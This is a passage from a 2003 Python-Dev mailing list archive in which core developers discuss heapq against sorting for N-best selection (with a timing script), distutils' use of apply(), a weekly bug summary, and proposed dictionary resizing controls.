> documents of the 6 million matches it found):

Ok, I think you're right, for this sort of thing heapq is better. One could 
extend my priorityDictionary code to limit memory like this but it would be 
unnecessary work when the extra features it has over heapq are not used for 
this sort of algorithm.

On the other hand, if you really want to find the n best items in a data 
stream large enough that you care about using only space O(n), it might 
also be preferable to take constant amortized time per item rather than the 
O(log n) that heapq would use, and it's not very difficult nor does it 
require any fancy data structures.  Some time back I needed some Java code 
for this, haven't had an excuse to port it to Python.  In case anyone's 
interested, it's online at 
<http://www.ics.uci.edu/~eppstein/161/KBest.java>.  Looking at it now, it 
seems more complicated than it needs to be, but maybe that's just the 
effect of writing in Java instead of Python (I've seen an example of a 
three-page Java implementation of an algorithm in a textbook that could 
easily be done in a dozen Python lines).
-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From eppstein@ics.uci.edu  Sun May  4 08:54:21 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sun, 04 May 2003 00:54:21 -0700
Subject: [Python-Dev] Re: heaps
References: <LNBBLJKPBEHFEDALKOLCEENNEEAB.tim.one@comcast.net> <17342817.1052002018@[10.0.1.2]>
Message-ID: <eppstein-B31965.00542004052003@main.gmane.org>

In article <17342817.1052002018@[10.0.1.2]>,
 David Eppstein <eppstein@ics.uci.edu> wrote:

> On the other hand, if you really want to find the n best items in a data 
> stream large enough that you care about using only space O(n), it might 
> also be preferable to take constant amortized time per item rather than the 
> O(log n) that heapq would use, and it's not very difficult nor does it 
> require any fancy data structures.  Some time back I needed some Java code 
> for this, haven't had an excuse to port it to Python.  In case anyone's 
> interested, it's online at 
> <http://www.ics.uci.edu/~eppstein/161/KBest.java>.

BTW, the central idea here is to use a random quicksort pivot to shrink 
the list, when it grows too large.

In python, this could be done without randomization as simply as

def addToNBest(L,x,N):
    L.append(x)
    if len(L) > 2*N:
        L.sort()
        del L[N:]

It's not constant amortized time due to the sort, but that's probably 
more than made up for due to the speed of compiled sort versus 
interpreted randomized pivot.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From skip@mojam.com  Sun May  4 13:00:24 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 4 May 2003 07:00:24 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305041200.h44C0OY12616@manatee.mojam.com>

Bug/Patch Summary
-----------------

423 open / 3606 total bugs (+17)
137 open / 2130 total patches (+10)

New Bugs
--------

mmap's resize method resizes the file in win32 but not unix (2003-04-27)
	http://python.org/sf/728515
Long file names in osa suites (2003-04-27)
	http://python.org/sf/728574
ConfigurePython gives depreaction warning (2003-04-27)
	http://python.org/sf/728608
super bug (2003-04-28)
	http://python.org/sf/729103
building readline module fails on Irix 6.5 (2003-04-28)
	http://python.org/sf/729236
What's new in Python2.3b1 HTML generation. (2003-04-28)
	http://python.org/sf/729297
comparing versions - one a float (2003-04-28)
	http://python.org/sf/729317
rexec not listed as dead (2003-04-29)
	http://python.org/sf/729817
MacPython-OS9 eats CPU while waiting for I/O (2003-04-29)
	http://python.org/sf/729871
metaclasses, __getattr__, and special methods (2003-04-29)
	http://python.org/sf/729913
socketmodule.c: inet_pton() expects 4-byte packed_addr (2003-04-30)
	http://python.org/sf/730222
Unexpected Changes in list Iterator (2003-04-30)
	http://python.org/sf/730296
Not detecting AIX_GENUINE_CPLUSPLUS (2003-04-30)
	http://python.org/sf/730467
Python 2.3 bsddb docs need update (2003-05-01)
	http://python.org/sf/730938
HTTPRedirectHandler variable out of scope (2003-05-01)
	http://python.org/sf/730963
urllib2 raises AttributeError on redirect (2003-05-01)
	http://python.org/sf/731116
test_tarfile writes in Lib/test directory (2003-05-02)
	http://python.org/sf/731403
Importing anydbm generates exception if _bsddb unavailable (2003-05-02)
	http://python.org/sf/731501
Pimp needs to be able to update itself (2003-05-02)
	http://python.org/sf/731626
OSX installer .pkg file permissions (2003-05-02)
	http://python.org/sf/731631
Package Manager needs Help menu (2003-05-02)
	http://python.org/sf/731635
IDE "lookup in documentation" doesn't work in interactive wi (2003-05-02)
	http://python.org/sf/731643
GIL not released around getaddrinfo() (2003-05-02)
	http://python.org/sf/731644
An extended definition of "non-overlapping" would save time. (2003-05-04)
	http://python.org/sf/732120
Clarification of "pos" and "endpos" for match objects. (2003-05-04)
	http://python.org/sf/732124

New Patches
-----------

Fixes for setup.py in Mac/OSX/Docs (2003-04-27)
	http://python.org/sf/728744
test_timeout updates (2003-04-28)
	http://python.org/sf/728815
Compiler warning on Solaris 8 (2003-04-28)
	http://python.org/sf/729305
Dictionary tuning (2003-04-29)
	http://python.org/sf/729395
Add Py_AtInit() startup hook for extenders (2003-04-30)
	http://python.org/sf/730473
assert from longobject.c, line 1215 (2003-04-30)
	http://python.org/sf/730594
RTEMS does not have a popen (2003-04-30)
	http://python.org/sf/730597
socketmodule inet_ntop built when IPV6 is disabled (2003-04-30)
	http://python.org/sf/730603
pimp.py has old URL for default database (2003-05-01)
	http://python.org/sf/731151
redirect fails in urllib2 (2003-05-01)
	http://python.org/sf/731153
AssertionError when building rpm under RedHat 9.1 (2003-05-02)
	http://python.org/sf/731328
make threading join() method return a value (2003-05-02)
	http://python.org/sf/731607
SpawnedGenerator class for threading module (2003-05-02)
	http://python.org/sf/731701
find correct socklen_t type (2003-05-03)
	http://python.org/sf/731991
exit status of latex2html "ignored" (2003-05-04)
	http://python.org/sf/732143

Closed Bugs
-----------

"es#" parser marker leaks memory (2002-01-10)
	http://python.org/sf/501716
math.fabs documentation is misleading (2003-03-22)
	http://python.org/sf/708205
Lineno calculation sometimes broken (2003-03-24)
	http://python.org/sf/708901
Put a reference to print in the Library Reference, please. (2003-04-17)
	http://python.org/sf/723136
imaplib should convert line endings to be rfc2822 complient (2003-04-18)
	http://python.org/sf/723962
socketmodule doesn't compile on strict POSIX systems (2003-04-20)
	http://python.org/sf/724588
SRE bug with capturing groups in alternatives in repeats (2003-04-21)
	http://python.org/sf/725106
valgrind python fails (2003-04-24)
	http://python.org/sf/727051
tmpnam problems on windows 2.3b, breaks test.test_os (2003-04-26)
	http://python.org/sf/728097

Closed Patches
--------------

fix for bug 501716 (2003-02-11)
	http://python.org/sf/684981
OpenVMS complementary patches (2003-03-23)
	http://python.org/sf/708495
unchecked return values - compile.c (2003-03-23)
	http://python.org/sf/708604
Cause pydoc to show data descriptor __doc__ strings (2003-03-29)
	http://python.org/sf/711902
timeouts for FTP connect (and other supported ops) (2003-04-03)
	http://python.org/sf/714592
Modules/addrinfo.h patch (2003-04-22)
	http://python.org/sf/725942
Remove extra line ending in CGI XML-RPC responses (2003-04-25)
	http://python.org/sf/727805


From m@moshez.org  Sun May  4 19:55:44 2003
From: m@moshez.org (Moshe Zadka)
Date: 4 May 2003 18:55:44 -0000
Subject: [Python-Dev] Distutils using apply
Message-ID: <20030504185544.6010.qmail@green.zadka.com>

Hi!
I haven't seen this come up yet -- why is distutils still using apply?
It causes warnings to be emitted when building packages with Python 2.3
and -Wall, and is altogether unclean.

Is this just a matter of checking in a patch? Or submitting one to SF?
Or is there a real desire to be compatible to Python 1.5.2?

Thanks,
Moshe

-- 
Moshe Zadka -- http://moshez.org/
Buffy: I don't like you hanging out with someone that... short.
Riley: Yeah, a lot of young people nowadays are experimenting with shortness.
Agile Programming Language -- http://www.python.org/


From goodger@python.org  Sun May  4 20:18:04 2003
From: goodger@python.org (David Goodger)
Date: Sun, 04 May 2003 15:18:04 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <3EB5676C.1000900@python.org>

Moshe Zadka wrote:
> Or is there a real desire to be compatible to Python 1.5.2?

PEP 291 lists distutils as requiring 1.5.2 compatibility.

-- David Goodger



From Raymond Hettinger" <python@rcn.com  Sun May  4 23:59:46 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 18:59:46 -0400
Subject: [Python-Dev] Dictionary sparseness
Message-ID: <001301c31290$fcea25e0$125ffea9@oemcomputer>

After more dictionary sparseness experiments, I've become 
convinced that the ideal settings are better left up to the user 
who is in a better position to know:

* anticipated dictionary size 
* overall application memory issues
* characteristic access patterns (stores vs. reads vs. deletions vs. iteration)
* when the dictionary is growing, shrinking, or stablized.
* whether many deletions have taken place

I have two competing proposals to expose dictresize():

1)  d.resize(minsize=0)

The first approach allows a user to trigger a resize().  This is handy
after deletions have taken place and dictionary contents have become
stable.  It allows the dictionary to be rebuilt without dummy entries.

If the minsize factor is specified, then the dictionary will be built
to the specified size or larger if needed to achieve a power of two
or to accommodate existing entries.

That is handy when building a dictionary whose approximate size 
is known in advance because it eliminates all of the intermediate
resizes during construction.  For instance,  the builtin dictionary can
be pre-sized for the 126 entries and it will build more quickly.

It is also useful after dictionary contents have stabilized and the user
wants improved lookup time at the expense of additional memory
and slower iteration time.  For instance, the builtin dictionary can 
be resized to 500 entries making it so sparse that the lookups will 
typically hit on the first try.

This API requires a little user sophistication because the effects
get wiped out during the next automatic resize (when the dict is
two-thirds full). 


2)  d.setsparsity(factor=1)

The second approach does not allow dictionaries to be pre-sized,
but the effects do not get wiped out by normal dictionary activity.

It is handy when a particular dictionary's lookup/insertion time 
is more important than iteration time or space considerations.  
For instance, the builtin dictionary can be set to a sparsity factor 
of four so that lookups are more rapid.


Raymond Hettinger



From drifty@alum.berkeley.edu  Mon May  5 00:27:16 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sun, 4 May 2003 16:27:16 -0700 (PDT)
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <Pine.SOL.4.55.0305041617190.15649@death.OCF.Berkeley.EDU>

[Raymond Hettinger]

> I have two competing proposals to expose dictresize():
>
> 1)  d.resize(minsize=0)
>
> The first approach allows a user to trigger a resize().  This is handy
> after deletions have taken place and dictionary contents have become
> stable.  It allows the dictionary to be rebuilt without dummy entries.
<snip - explanation of method>

The issue I see with this is people going overboard with calls to this.
I can easily imagine a new Python programmer calling this after every
insertion or deletion into the dictionary.  I can even see experienced
programmer getting trapped into this by coming up with a size and then
coding themselves into a corner by trying to maintain the size.  I also
see people coding a size that is optimal and then changing their code but
forgetting to change the value passed to the method, thus negating the
perk of having this option set

> 2)  d.setsparsity(factor=1)
>
> The second approach does not allow dictionaries to be pre-sized,
> but the effects do not get wiped out by normal dictionary activity.
>
<snip>

This is more reasonable.  Since it is a factor it will makes sense to
beginners who view it as a sliding scale and also allows more experienced
programmers to set it to where they know they want the performance.  And
setting the value will more than likely be good no matter how the code is
changed since the use of the dictionary will most likely stay consistent.

Do either hinder dictionary performance just by introducing the possible
functionality?

I am -1 on 'resize' and +0, teetering on +1, for setsparsity.  I will kick
over to +1 if someone else out there with more experience with newbies can
say strongly that they don't see them messing up with this option.

-Brett

P.S.: Thanks, Raymond, for doing all of this work and documenting it so
well.


From guido@python.org  Mon May  5 01:34:33 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 04 May 2003 20:34:33 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: "Your message of Sun, 04 May 2003 18:59:46 EDT."
 <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>

> After more dictionary sparseness experiments, I've become 
> convinced that the ideal settings are better left up to the user 
> who is in a better position to know:
> 
> * anticipated dictionary size 
> * overall application memory issues
> * characteristic access patterns (stores vs. reads vs. deletions
>   vs. iteration)
> * when the dictionary is growing, shrinking, or stablized.
> * whether many deletions have taken place

Hm.  Maybe so, but it *is* a feature that there are no user controls
over dictionary behavior, based on the observation that for every user
who knows enough about the dict implementation to know how to tweak
it, there are at least 1000 who don't, and the latter, in their
ill-advised quest for more speed, will use the tweakage API to their
detriment.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Mon May  5 03:06:26 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sun, 4 May 2003 21:06:26 -0500
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <3EB5676C.1000900@python.org>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
Message-ID: <16053.50978.292901.471132@montanaro.dyndns.org>

    >> Or is there a real desire to be compatible to Python 1.5.2?

    David> PEP 291 lists distutils as requiring 1.5.2 compatibility.

Then should distutils be suppressing those warnings?

Skip


From tim.one@comcast.net  Mon May  5 03:20:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 22:20:09 -0400
Subject: [Python-Dev] Re: heaps
In-Reply-To: <17342817.1052002018@[10.0.1.2]>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>

This is a multi-part message in MIME format.

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

[David Eppstein]
> Ok, I think you're right, for this sort of thing heapq is better.
> One could extend my priorityDictionary code to limit memory like
> this but it would be unnecessary work when the extra features it
> has over heapq are not used for this sort of algorithm.

I don't believe memory usage was an issue here.  Take a look at the code
again (comments removed):

"""
q = priorityDictionary()

for dummy in xrange(N):
    q[Person(-1)] = -1

for person in people:
    if person.income > q.smallest().income:
        del q[q.smallest()]
        q[person] = person.income
"""

q starts with N entries.  Each trip around the loop either leaves the q
contents alone, or both removes and adds an entry.  So the size of the dict
is a loop invariant, len(q) == N.  In the cases where it does remove an
entry, it always removes the smallest entry, and the entry being added is
strictly larger than that, so calling q.smallest() at the start of the next
loop trip finds the just-deleted smallest entry still in self.__heap[0], and
removes it.  So the internal list may grow to N+1 entries immediately
following

        del q[q.smallest()]

but by the time we get to that line again it should be back to N entries
again.

The reasons I found heapq easier to live with in this specific app had more
to do with the subtleties involved in sidestepping potential problems with
__hash__, __cmp__, and the speed of tuple comparison when the first tuple
elements tie.  heapq also supplies a "remove current smallest and replace
with a new value" primitive, which happens to be just right for this app
(that isn't an accident <wink>):

"""
dummy = Person(-1)
q = [dummy] * N

for person in people:
    if person > q[0]:
        heapq.heapreplace(q, person)
"""

> On the other hand, if you really want to find the n best items in a data
> stream large enough that you care about using only space O(n), it might
> also be preferable to take constant amortized time per item rather than
> the O(log n) that heapq would use,

In practice, it's usually much faster than that.  Over time, it gets rarer
and rarer for

    person > q[0]

to be true (the new person has to be larger than the N-th largest seen so
far, and that bar gets raised whenever a new person manages to hurdle it),
and the vast majority of sequence elements are disposed with via that single
Python statement (the ">" test fails, and we move on to the next element
with no heap operations).  In the simplest case, if N==1, the incoming data
is randomly ordered, and the incoming sequence has M elements, the if-test
is true (on average) only ln(M) times (the expected number of left-to-right
maxima).  The order statistics get more complicated as N increases, of
course, but in practice it remains very fast, and doing a heapreplace() on
every incoming item is the worst case (achieved if the items come in sorted
order; the best case is when they come in reverse-sorted order, in which
case min(M, N) heapreplace() operations are done).

> and it's not very difficult nor does it require any fancy data
> structures.  Some time back I needed some Java code for this,
> haven't had an excuse to port it to Python.  In case anyone's
> interested, it's online at
> <http://www.ics.uci.edu/~eppstein/161/KBest.java>.
> Looking at it now, it seems more complicated than it needs to be, but
> maybe that's just the effect of writing in Java instead of Python
> (I've seen an example of a  three-page Java implementation of an
> algorithm in a textbook that could  easily be done in a dozen Python
> lines).

Cool!  I understood the thrust but not the details -- and I agree Java must
be making it harder than it should be <wink>.

> In python, this could be done without randomization as simply as
>
> def addToNBest(L,x,N):
>    L.append(x)
>    if len(L) > 2*N:
>        L.sort()
>        del L[N:]
>
> It's not constant amortized time due to the sort, but that's probably
> more than made up for due to the speed of compiled sort versus
> interpreted randomized pivot.

I'll attach a little timing script.  addToNBest is done inline there, some
low-level tricks were played to speed it, and it was changed to be a max
N-best instead of a min N-best.  Note that the list sort in 2.3 has a real
advantage over Pythons before 2.3 here, because it recognizes (in linear
time) that the first half of the list is already in sorted order (on the
second & subsequent sorts), and leaves it alone until a final merge step
with the other half of the array.

The relative speed (compared to the heapq code) varies under 2.3, seeming to
depend mostly on M/N.  The test case is set up to find the 1000 largest of a
million random floats.  In that case the sorting method takes about 3.4x
longer than the heapq approach.  As N gets closer to M, the sorting method
eventually wins; when M and N are both a million, the sorting method is 10x
faster.  For most N-best apps, M is much smaller than N, and the heapq code
should be quicker unless the data is already in order.

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)
Content-type: text/plain; name=timeq.py
Content-transfer-encoding: 7BIT
Content-disposition: attachment; filename=timeq.py

def one(seq, N):
    from heapq import heapreplace

    L = [-1] * N
    for x in seq:
        if x > L[0]:
            heapreplace(L, x)

    L.sort()
    return L

def two(seq, N):
    L = []
    push = L.append
    twoN = 2*N
    for x in seq:
        push(x)
        if len(L) > twoN:
            L.sort()
            del L[:-N]

    L.sort()
    del L[:-N]
    return L

def timeit(seq, N):
    from time import clock as now

    s = now()
    r1 = one(seq, N)
    t = now()
    e1 = t - s

    s = now()
    r2 = two(seq, N)
    t = now()
    e2 = t - s

    print len(seq), N, e1, e2
    assert r1 == r2

def tryone(M, N):
    from random import random
    seq = [random() for dummy in xrange(M)]
    timeit(seq, N)

for i in range(10):
    tryone(1000000, 1000)

--Boundary_(ID_19ec9GZ0WH09Yh6NFIvyew)--


From python@rcn.com  Mon May  5 03:22:08 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 22:22:08 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003301c312ad$2113e520$125ffea9@oemcomputer>

> > After more dictionary sparseness experiments, I've become 
> > convinced that the ideal settings are better left up to the user 
> > who is in a better position to know:
> > 
> > * anticipated dictionary size 
> > * overall application memory issues
> > * characteristic access patterns (stores vs. reads vs. deletions
> >   vs. iteration)
> > * when the dictionary is growing, shrinking, or stablized.
> > * whether many deletions have taken place
> 
> Hm.  Maybe so, but it *is* a feature that there are no user controls
> over dictionary behavior, based on the observation that for every user
> who knows enough about the dict implementation to know how to tweak
> it, there are at least 1000 who don't, and the latter, in their
> ill-advised quest for more speed, will use the tweakage API to their
> detriment.

Perhaps there should be safety-belts and kindergarten controls:

   d.pack(fat=False) --> None.  Reclaims deleted entries.
         If optional fat argument is true, the internal size is doubled
         resulting in potentially faster lookups at the expense of
         slower iteration and more memory.
  
This ought to be both safe and simple.


Raymond Hettinger


P.S.  Also, I think it worthwhile to at least transform dictresize()
into PyDict_Resize() so that C extensions will have some control.
This would make it possible for us to add a single line making
the builtin dictionary more sparse and providing a 75% first probe
hit rate.



From skip@pobox.com  Mon May  5 03:24:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Sun, 4 May 2003 21:24:31 -0500
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <16053.52063.690466.272706@montanaro.dyndns.org>

    Raymond> After more dictionary sparseness experiments, I've become
    Raymond> convinced that the ideal settings are better left up to the
    Raymond> user who is in a better position to know:

Speaking as a moderately sophisticated Python programmer, I can tell you I
wouldn't have the slightest idea what the properties of my applications'
dictionary usage is.  Unless I'm going to get a major league speedup (like
factor of two or greater) tweaking these settings, I don't see that they'd
benefit me.

Skip


From python@rcn.com  Mon May  5 03:26:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 4 May 2003 22:26:47 -0400
Subject: [Python-Dev] Re: heaps
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
Message-ID: <003f01c312ad$c7277580$125ffea9@oemcomputer>

> The relative speed (compared to the heapq code) varies under 2.3, seeming to
> depend mostly on M/N.  The test case is set up to find the 1000 largest of a
> million random floats.  In that case the sorting method takes about 3.4x
> longer than the heapq approach.  As N gets closer to M, the sorting method
> eventually wins; when M and N are both a million, the sorting method is 10x
> faster.  For most N-best apps, M is much smaller than N, and the heapq code
> should be quicker unless the data is already in order.

FWIW, there is C implementation of heapq at:
   http://zhar.net/projects/python/


Raymond Hettinger 


From tim.one@comcast.net  Mon May  5 04:00:09 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 04 May 2003 23:00:09 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <003301c312ad$2113e520$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net>

[Raymond Hettinger]
> ...
> P.S.  Also, I think it worthwhile to at least transform dictresize()
> into PyDict_Resize() so that C extensions will have some control.
> This would make it possible for us to add a single line making
> the builtin dictionary more sparse and providing a 75% first probe
> hit rate.

The dynamic hit rate is the one that counts, and, e.g., it's not going to
speed anything to remove the current lowest-8-but-not-lowest-9-bits
collision between 'ArithmeticError' and 'reload' (I've never seen the former
used, and the latter is expensive).  IOW, measuring the dynamic first-probe
hit rate is a prerequisite to selling this idea; a stronger prerequisite is
demonstrating actual before-and-after speedups.

I agree with Guido that giving people controls they're ill-equipped to
understand will do more harm than good.  Even when they manage to stumble
into a small speedup, that will often become counterproductive over time, as
the characteristics of their ever-growing app change, and the Speed Weenie
who got the 2% speedup left, or moved on to some other project.  Or somebody
corrects the option name from 'smalest' to 'smallest', and suddenly the only
dict entry that mattered doesn't collide anymore -- but the mystery knob
boosting the dict size "because it sped things up" forever more wastes half
the space for a reason nobody ever understood.  Or we change Python's string
hash to use addition instead of xor to merge in the next character (a change
that may actually help a bit -- addition is a littler better at scrambling
the bits).  Etc.

it's-python-it's-supposed-to-be-slow<wink>-ly y'rs  - tim



From eppstein@ics.uci.edu  Mon May  5 04:26:29 2003
From: eppstein@ics.uci.edu (David Eppstein)
Date: Sun, 04 May 2003 20:26:29 -0700
Subject: [Python-Dev] Re: heaps
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCIEPCEEAB.tim.one@comcast.net>
Message-ID: <20414172.1052079989@[10.0.1.2]>

On 5/4/03 10:20 PM -0400 Tim Peters <tim.one@comcast.net> wrote:
> In practice, it's usually much faster than that.  Over time, it gets rarer
> and rarer for
>
>     person > q[0]
>
> to be true (the new person has to be larger than the N-th largest seen so
> far, and that bar gets raised whenever a new person manages to hurdle it),

Good point.  If any permutation of the input sequence is equally likely, 
and you're selecting the best k out of n items, the expected number of 
times you have to hit the data structure in your heapq solution is roughly 
k ln n, so the total expected time is O(n + k log k log n), with a really 
small constant factor on the O(n) term.  The sorting solution I suggested 
has total time O(n log k), and even though sorting is built-in and fast it 
can't compete when k is small.   Random pivoting is O(n + k), but with a 
larger constant factor, so your heapq solution looks like a winner.

For fairness, it might be interesting to try another run of your test in 
which the input sequence is sorted in increasing order rather than random. 
I.e., replace the random generation of seq by
    seq = range(M)
I'd try it myself, but I'm still running python 2.2 and haven't installed 
heapq.  I'd have to know more about your application to have an idea 
whether the sorted or randomly-permuted case is more representative.

-- 
David Eppstein                      http://www.ics.uci.edu/~eppstein/
Univ. of California, Irvine, School of Information & Computer Science



From oren-py-d@hishome.net  Mon May  5 06:23:35 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 01:23:35 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <20030505052335.GA37311@hishome.net>

On Sun, May 04, 2003 at 06:55:44PM -0000, Moshe Zadka wrote:
> Hi!
> I haven't seen this come up yet -- why is distutils still using apply?
> It causes warnings to be emitted when building packages with Python 2.3
> and -Wall, and is altogether unclean.
> 
> Is this just a matter of checking in a patch? Or submitting one to SF?
> Or is there a real desire to be compatible to Python 1.5.2?

I was wondering if a milder form of deprecation may be appropriate for
some features such as the apply builtin:

1. Add a notice in docstring 'not recommended for new code'
2. Move to 'obsolete' or 'backward compatibility' section in manual
3. Do NOT produce a warning (pychecker may still do that)
4. Do NOT plan removal of feature in a specific future release

    Oren


From martin@v.loewis.de  Mon May  5 06:55:56 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 05 May 2003 07:55:56 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <16053.50978.292901.471132@montanaro.dyndns.org>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
 <16053.50978.292901.471132@montanaro.dyndns.org>
Message-ID: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

>     David> PEP 291 lists distutils as requiring 1.5.2 compatibility.
> 
> Then should distutils be suppressing those warnings?

This isn't trivial: the warnings module is not available in Python
1.5.2.

Regards,
Martin



From m@moshez.org  Mon May  5 07:40:51 2003
From: m@moshez.org (Moshe Zadka)
Date: 5 May 2003 06:40:51 -0000
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>
References: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>, <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
 <16053.50978.292901.471132@montanaro.dyndns.org>
Message-ID: <20030505064051.29353.qmail@green.zadka.com>

[Trimming CC list]

On 05 May 2003, martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=) wrote:

> This isn't trivial: the warnings module is not available in Python
> 1.5.2.

Yes it is (trivial, not in 1.5.2)

try:
    import warnings
except ImportError:
    pass
else:
    ...disable warnings...

Thanks,
Moshe 
-- 
Moshe Zadka -- http://moshez.org/
Buffy: I don't like you hanging out with someone that... short.
Riley: Yeah, a lot of young people nowadays are experimenting with shortness.
Agile Programming Language -- http://www.python.org/


From mal@lemburg.com  Mon May  5 08:41:05 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 05 May 2003 09:41:05 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <3EB61591.5070204@lemburg.com>

Moshe Zadka wrote:
> Hi!
> I haven't seen this come up yet -- why is distutils still using apply?
> It causes warnings to be emitted when building packages with Python 2.3
> and -Wall, and is altogether unclean.

Could someone please explain why apply() was marked deprecated ?

The only reference I can find is in PEP 290 and that merely
reports this "fact".

I'm -1 on deprecating apply(). Not only because it introduces yet
another incompatiblity between Python versions, but also because it
is still useful in the context of having a function which mimics
a function call, e.g. for map() and other instance where you
pass around functions as operators.

> Is this just a matter of checking in a patch? Or submitting one to SF?
> Or is there a real desire to be compatible to Python 1.5.2?

Yes. It was decided that Python 2.3 will ship with the last
version of distutils that is Python 1.5.2 compatible. After that
it may drop that compatibility and become Python 2.0 compatible.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 05 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        50 days left



From python@rcn.com  Mon May  5 10:28:51 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 5 May 2003 05:28:51 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net>
Message-ID: <001501c312e8$bd892420$125ffea9@oemcomputer>

> it's-python-it's-supposed-to-be-slow<wink>-ly y'rs  - tim

Oh, now you tell me.
I've got about a hundred failed experiments that provide
slowdowns ranging from modest to excruciating.  Take
your pick.

My favorite:  Eliminating the test for dummy entry re-use 
ended up hurting every benchmark and completely
destroying a couple of them.


Raymond


 



From guido@python.org  Mon May  5 12:47:39 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 07:47:39 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: "Your message of Sun, 04 May 2003 22:22:08 EDT."
 <003301c312ad$2113e520$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>
 <003301c312ad$2113e520$125ffea9@oemcomputer>
Message-ID: <200305051147.h45Bldw24692@pcp02138704pcs.reston01.va.comcast.net>

> > Hm.  Maybe so, but it *is* a feature that there are no user controls
> > over dictionary behavior, based on the observation that for every user
> > who knows enough about the dict implementation to know how to tweak
> > it, there are at least 1000 who don't, and the latter, in their
> > ill-advised quest for more speed, will use the tweakage API to their
> > detriment.
> 
> Perhaps there should be safety-belts and kindergarten controls:
> 
>    d.pack(fat=False) --> None.  Reclaims deleted entries.
>          If optional fat argument is true, the internal size is doubled
>          resulting in potentially faster lookups at the expense of
>          slower iteration and more memory.
>   
> This ought to be both safe and simple.

And a waste of time except in the most rare circumstances.

> Raymond Hettinger
> 
> 
> P.S.  Also, I think it worthwhile to at least transform dictresize()
> into PyDict_Resize() so that C extensions will have some control.
> This would make it possible for us to add a single line making
> the builtin dictionary more sparse and providing a 75% first probe
> hit rate.

And that would give *how much* of a performance improvement of typical
applications?

Sorry, I really think that you're complexificating APIs here without
sufficient gain.  I really value the work you've done on figuring out
how to improve dicts, but I think you've come to know the code too
well to see the other side of the coin.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 13:02:08 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 08:02:08 -0400
